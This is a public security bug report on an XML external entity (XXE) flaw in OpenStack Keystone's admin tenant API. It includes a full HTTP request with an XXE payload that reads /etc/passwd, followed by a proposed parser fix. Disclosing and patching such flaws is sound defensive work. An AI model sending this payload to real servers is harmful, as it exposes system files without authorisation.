XXE vulnerability in keystone

Bug #1111828 reported by Stuart Stent
Affects: OpenStack Identity (keystone)
Status: New
Importance: Undecided
Assigned to: Unassigned
Milestone: (not set)

Bug Description

It's possible to gain access to arbitrary files on a keystone server by injecting XXE into the admin interface of a keystone server.

You need a valid admin token to achieve this.

1. Authenticate to the Keystone service to gain a valid administrative token.
2. Submit the request below to the admin keystone endpoint.
3. Verify a tenant is created and the "description" field contains the contents of the /etc/passwd file on the keystone server.

POST https://admin-auth-cloud.com:35358/v2.0/tenants HTTP/1.1
Host: admin-auth-cloud.com:35358
Content-length: 253
Proxy-Connection: Keep-Alive
Accept: */*
X-Auth-Token: <VALID AUTH TOKEN>
User-Agent: python-keystoneclient
Content-Type: application/xml
Accept: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY foo SYSTEM "file:///etc/passwd"> ]>
<tenant xmlns="http://docs.openstack.org/identity/api/v2.0"
        enabled="true" id="XxeTest2" name="Xxe Tenant 2">
  <description>&foo;</description>
</tenant>

Possible solution:

keystone/common/serializer.py : 60 - 64

from lxml import etree  # module-level import; the snippet below uses lxml's etree

class XmlDeserializer(object):
    def __call__(self, xml_str):
        """Returns a dictionary populated by decoding the given xml string."""
        # Default lxml parser: resolves entities, including external SYSTEM entities
        dom = etree.fromstring(xml_str.strip())
        return self.walk_element(dom, True)

Replace:

        dom = etree.fromstring(xml_str.strip())

With:

        dom = etree.fromstring(xml_str.strip(),
                               parser=etree.XMLParser(resolve_entities=False))

Revision history for this message
Morgan Fainberg (mdrnstm) wrote :

Duplicate bug that is marked fixed released, making un-private.

information type: Private Security → Public